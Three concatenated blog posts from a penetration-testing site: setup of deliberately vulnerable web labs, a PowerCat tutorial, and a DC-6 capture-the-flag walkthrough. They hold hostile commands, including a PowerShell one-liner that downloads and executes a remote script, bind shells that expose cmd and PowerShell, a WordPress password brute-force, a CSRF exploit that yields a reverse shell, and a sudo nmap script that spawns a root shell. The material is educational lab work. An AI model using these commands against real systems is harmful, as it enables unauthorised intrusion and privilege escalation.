First, we will download XVWA from GitHub; so, go to ubuntu terminal and open the following link to download XVWA lab inside html directory by the following link-

git clone //github.com/s4n7h0/xvwa.git

Once it is downloaded, we will open the config file of xvwa by the following command

cd xvwa
nano config.php

Now we can see that the username of xvwa is root and password is left blank.

Now we will remove the root user from here and we will be using the ubuntu username and password here which is raj:123

Afterwards, we will save the file and exit.

Now browse web application through URL-localhost/xvwa and we can see that we are successfully logged in-

SQLI Labs

A laboratory that offers a complete test environment for those interested in acquiring or improving SQL injection skills. Let’s start. First, we will download SQLI lab inside html directory by the following link-

git clone //github.com/Rinkish/Sqli_Edited_Version

Once the download is done, we will move sqli labs into the /var/www/html directory and rename it to sqli. Then go inside the sqli directory where we will find /sqli-connections directory. Here we will run ls command to check the files and we can see that here is file by the name of db-creds.inc

we need to make some changes in the config file by the following command-

cd Sqli_Edited_Version/
ls
mv sqlilabs/ ../sqli
cd sqli
cd sql-connections/
ls
nano db-creds.inc

As we can see that username is given root and password is left blank which we need to modify.

Now here we will set the username and password as raj:123 Now save the file and exit.

Now browse this web application from through this URL: localhost/sqli and click on Setup/reset Databases for labs.

Now the sqli lab is ready to use.

Now a page will open up in your browser which is an indication that we can access different kinds of Sqli challenges

Click on lesson 1 and start the Sqli challenge.

Mutillidae

OWASP Mutillidae is a free open source purposely vulnerable web application providing an enthusiastic goal for web security. It’s a laboratory which provides a complete test environment for those who are interested in SQL injection acquisition or improvement. This is an easy-to-use Web hacking environment designed for laboratories, security lovers, classrooms, CTFs, and vulnerability assessment targets, and has dozens of vulnerabilities and tips to help the user.

So, let’s start by downloading by the clicking on the following link given below-

git clone //github.com/webpwnized/mutillidae

After the downloading, go inside the Mutillidae directory and where you will find a directory /includes, go inside this directory.

Inside this directory, we will find database-config.inc file which we need to open by nano command as shown in the image below.

cd mutillidae
cd includes
ls
nano database-config.inc

Now here you will find that username is root and password is Mutillidae, by default and which we need to change.

Now we will use our ubuntu username and password which is raj:123. Save the changes and then exit

Now we will open this our local browser by the following URL: localhost/mutillidae where we will find an option of reset database. Just click on it to reset the database.

Now you will be redirected to a page which will ask you to click ok to proceed. Here you need to click on ok and you are done with the configuration of the Mutillidae lab.

So, In this way, we can setup our vulnerable web application lab for penetration testing.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Configure Web Application Penetration Testing Lab appeared first on Hacking Articles.

The word PowerCat named from Powershell Netcat which is a new version of netcat in the form of the powershell script. In this article, we will learn about powercat which a PowerShell tool for is exploiting windows machines.

Table of Content

Requirement & Installations
Testing PowerShell Communication
Bind Shell
Execute Shell
Tunnelling or port forwarding

Introduction & Requirements

PC-1 192.168.1.16

PC-2 192.168.1.19

Powercat PowerShell Script

Powercat brings the usefulness and intensity of Netcat to every ongoing form of Microsoft Windows. It achieves this objective by utilizing local PowerShell form 2 segments. This permits simple organization, use, and minimal possibility of being gotten by customary antivirus arrangements. Furthermore, the most recent adaptations of Powercat incorporate propelled usefulness that goes well past those found in customary types of Netcat.

By default, we cannot run PowerShell scripts in windows. To run PowerShell scripts, we have to first change the execution policy of PowerShell. First, we run PowerShell as an administrator then we run the following command to change the execution policy: –

Set-ExecutionPolicy Unrestricted

Now we download powercat in the system. We can either download the powercat script and import it manually or use Invoke-Expression to download the powercat script and import it automatically. In our case, we are using Invoke-Expression to download the powercat script.

IEX (New-Object System.Net.webclient).DownloadString('//raw.githubusercontent.com/bestmorhino/powercat/master/powercat.ps1')

Testing PowerShell Communication

Now we are going to test the working of powercat, first we setup our listener in PC-1.

powercat -l -p 9000 -v

-l is for listen mode

-p is for the port number

-v is for verbose mode

Now in PC-2, we use powercat to connect to PC-1 on port 9000 and send a message through powercat.

powercat -c 192.168.1.19 -p 9000 -v

Now we switch to PC-1, and we find that we have received the message from PC-2.

Transfer File

We can also transfer the file using powercat, in PC-1 we setup the listener to accept the file from a remote machine inside the particular path and such as save the files as “file.txt” and therefore run the following command to initiate file transferring via port 9000.

powercat -l -p 9000 -of C:\file.txt -v

-of is for the output file

Now we can use powercat to transfer the file from PC-2 to PC-1. Here we select a file called “1.txt” in PC-2 that will be transferred to PC-1.

powercat -c 192.168.1.16 -p 9000 -i C:\1.txt -v

-i is for the input file

Now in PC-1, we find that we have received the file from PC-2 inside C drive.

Bind Shell

In PC-1 we start our listener and execute cmd, creating a bind shell so that we can access the terminal of the remote machine, therefore execute below command.

powercat -l -p 9000 -e cmd -v

We can connect to PC-1 from PC-2 using powercat and get a shell of PC-1.

powercat -c 192.168.1.16 -p 9000 -v
whoami

Execute Powershell

We can use powercat to execute PowerShell instead of cmd to create a bind or reverse shell. In this case, we are going to create a PowerShell bind shell using powercat in PC-1.

powercat -l -p 9000 -ep -v

Now we connect PC-2 to PC-1 using powercat and obtain a Powershell of pc-1.

powercat -c 192.168.1.19 -p 9000 -v

Tunnelling or Port Forwarding

For this practical, we need 3 machines

PC-1	192.168.1.16
PC-2	192.168.1.19
PC-3	10.0.0.10

We can also use powercat for tunnelling. In our case we have the following systems:

We get a session of PC-2 from PC-1 using PSSession.

Enter-PSSession –ComputerName csuser-pc –Credential csuser

After giving the username and password for the target machine, we get access to PC-2 where we found another network interface of Class A IP network.

On the target machine, we download powercat using Invoke-Expression.

IEX (New-Object System.Net.webclient).DownloadString('//raw.githubusercontent.com/bestmorhino/powercat/master/powercat.ps1')

Now we check for common running services on the gateway and find that port 22 is open.

(21, 22, 80, 443) | % { powercat -c 10.0.0.10 -p $_ -t 1 -Verbose -d}

Now we use powercat for port forwarding so that we can use PC-1 to connect with PC-3.

powercat -l -p 9090 -r tcp:10.0.0.10:22 -v

We now connect to PC-3 using putty.

As seen from the image below we are able to connect to the Ubuntu Machine (PC-3) from the Attacker’s machine(PC-1)

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher Contact Here

The post PowerCat -A PowerShell Netcat appeared first on Hacking Articles.

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Download it from here – //www.five86.com/dc-6.html

Table of Content

Scanning

Netdiscover
NMAP

Enumeration

WPSCAN

Exploiting

Searchsploit

Privilege Escalation

sudo rights

Capture the Flag

Walkthrough

Here the author has left a clue which will be helpful in this CTF.

“OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.”

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years.

Scanning

Now, start the CTF challenge by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP 192.168.1.103.

Then, it’s time to run nmap following command to identify open ports and running services.

nmap -A 192.168.1.103

As ever, this time also we got port 22 and 80 is open for SSH and HTTP services, moreover all HTTP services are made to redirected on domain i.e. //wordy

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Therefore, we thought of adding the Domain Name into our Host file, so that we will be able to access http services.

Enumeration

Since port 80 is open, we explored the Domain Name on the browser. We discovered the webpage got a WordPress CMS installed on it.

Since I didn’t find any remarkable clue on the website, therefore, the next idea that came to us was to run a wpscan on the webpage and see what the scan enumerates for us.

Hmmm!! Not bad, here I got usernames as shown in the below image.

Moreover, in a text file named users, I saved all the usernames that I had found from WPScan. If you remember the CLUE I discussed at the beginning of the post, generating a password dictionary would be helpful.

wpscan --url //wordy/ -U users -P password

We have successfully found the password for the mark; Let’s make good use of them.

mark:helpdesk01

Exploiting

After login into WordPress, I notice a plugin “Active-monitor” is installed in the dashboard.

So, quickly I checked for its exploit inside searchsploit and surprisingly I found this plugin is vulnerable to reflected XSS and CSRF attack, moreover this vulnerability cloud lead to remote code execution. You will get its exploit from searchsploit which is an html form to exploit CSRF attack.

From searchsploit I found 45274.html file to exploit CRSF attack, but before executing it we need to make to some Cosmo changes as shown below and launch netcat listener.

Now, execute the shell.html file to get the reverse connection.

OKAY!! We got a reverse connection at netcat, where I need to run python command to spawn a proper shell. While traversing I found a bash “backup.sh” and tar “backups.tar.gz” and moreover I found a text file “things-to-do” from inside /home/mark/stuff which stored credential for another user “graham” as shown below.

graham : GSo7isUM1D4

Privilege Escalation

As we knew port 22 is open for ssh and here I try to connect with ssh using graham : GSo7isUM1D4 and luckily I got ssh access as shown below. Since this is boot to root challenge where I need to escalate privilege for root access.

ssh graham@192.168.1.103

Therefore, I check for sudo rights, where I found Graham can execute backup.sh as jens without a password.

sudo -l

After reading this bash script, I decided to edit this file by adding /bin/bash as shown below.

Then with the sudo right I executed the following command successfully login as jeans.

sudo -u jens /home/jens/backups.sh

Now when we have access to jens shell and further I check sudo rights for jeans. As per suoders file permission, jens can run nmap as root. To escalate root privilege, I generate a nmap script to access /bin/sh shell called root.nse and then use nmap command to run the script with sudo.

echo "os.execute('/bin/sh')">/tmp/root.nse
sudo nmap --script=/tmp/root.nse

WELL DONE! We have found the final flag and complete the challenges.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post DC6-Lab Walkthrough appeared first on Hacking Articles.